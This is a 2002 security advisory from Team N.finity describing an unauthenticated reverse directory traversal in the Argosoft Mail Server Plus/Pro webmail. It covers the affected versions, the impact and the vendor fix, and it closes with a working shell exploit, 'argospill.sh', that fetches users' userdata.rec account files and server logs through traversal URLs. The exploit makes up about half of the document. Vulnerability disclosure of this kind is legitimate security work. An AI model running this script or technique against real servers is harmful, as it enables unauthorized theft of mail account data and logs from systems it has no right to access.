Argosoft Mail Server Plus/Pro Webmail Reverse Directory Traversal

[<nfinity () gmx net>]

Team N.finity Security Advisory
03/07/2002

Argosoft Mail Server Plus/Pro Webmail Reverse Directory Traversal


Summary
===================

    Argosoft Mail Server Pro contains a built-in HTTP server for
    webmail access. Without logging in, an attacker can do a
    reverse directory traversal to retrieve any file on the drive
    that System can read by specifying a series of "/.." after the
    path to the images of the webmail server or of the mail
    attachments for a valid user.


Systems Affected
===================

    Any Windows system using the webmail feature of Argosoft Mail 
    Server Plus / Pro <= 1.8.1.5

    The freeware edition of Argosoft Mail Server is not vulnerable.


Impact
===================

    An attacker can retrieve any file on the disk readable by
    the mail server.  The filename and relative path needs to be
    specified, as directory listings are not generated.  Executable
    files are also not run as this is not supported by the webmail.


Explanation
===================

    Argosoft Mail Server comes in three versions: Freeware, Plus,
    and Pro. The Plus and Pro versions come with a build-in web
    server to provide simple Webmail access to users' mail.

    The webmail server does not check for reverse directory
    traversal. This allows an attacker to exploit the images or
    attachments directory to list the contents of files on the
    drive.

    Also, normally, a user will have to log into Argosoft Mail
    Server Pro's webmail in order to read his mail and attachments.
    However, it allows non-authenticated users to retrieve files
    via the attachments URL, as long as a valid path is specified.
    This can be exploited to retrieve the attachments of users in
    certain conditions, or can also be reverse traversed.

    While the attachments folder is deleted once the user logs out
    of the webmail or after 20 minutes of inactivity, this exploit
    will work even if the attachments folder is not present.


Solution
===================

    The vendor has released a new version at
    http://www.argosoft.com/applications/mailserver/


Acknowledgments
===================

    Vulnerability discovery, exploit code, and advisory by Mayhem
    of Team N.finity.


Contact Information
===================

    Team N.finity can be reached by mailing to
    nfinity () gmx net.


References
===================

    [1] Team N.finity
    http://nfinity.yoll.net/


Disclaimer
===================

    This advisory does not claim to be complete or to be usable for
    any purpose.  Information about the vulnerable systems may be
    inaccurate or wrong.  Any supplied exploits are not to be used
    for malicious purposes, but for educational purposes only.

    This advisory is free for open distribution in unmodified form.
    Articles that are based on information from this advisory
    should include link [1].


Exploit Code
===================

#!/bin/sh
#
# released on 06/07/2002 by team n.finity <nfinity () gmx net>
# find us at http://nfinity.yoll.net/
#
# argospill.sh

HOST=$1
USER=$2
DOMAIN=$3

startpro()
{
    echo -e "\nSpilling user $USER @ $DOMAIN, host $HOST (Pro)\n"
    URL=/_users/$DOMAIN/$USER/_tempatt/../userdata.rec
    /usr/bin/lynx -dump http://$HOST$URL
}

startplus()
{
    echo -e "\nSpilling user $USER, host $HOST (Plus)\n"
    URL=/$USER/_tempatt/../userdata.rec
    /usr/bin/lynx -dump http://$HOST$URL
}

startboth()
{
    echo -e "\nSpilling host $HOST (Plus / Pro)\n"
    URL=/images/../_logs/`date -d '-1 day' +%Y-%m-%d`.txt
    /usr/bin/lynx -dump http://$HOST$URL
}

usage()
{
    echo -e "\nUsage:\n"
    echo "Both - $0 <host>"
    echo "Pro  - $0 <host> <user> <domain>"
    echo "Plus - $0 <host> <user>"
    echo -e "\nExample:\n"
    echo "Both, images dir - $0 www.test.com"
    echo "Plus, no dom req - $0 www.test.com me"
    echo "Pro, default dom - $0 www.test.com me _nodomain"
    echo "Pro, virtual dom - $0 www.test.com me test.com"
}

echo "Argospill 1.0 by Team N.finity"

if [ -n "$HOST" ]; then
    if [ -n "$USER" ]; then
        if [ -n "$DOMAIN" ]; then
            startpro
        else
            startplus
        fi
    else
        startboth
    fi
else
    usage
fi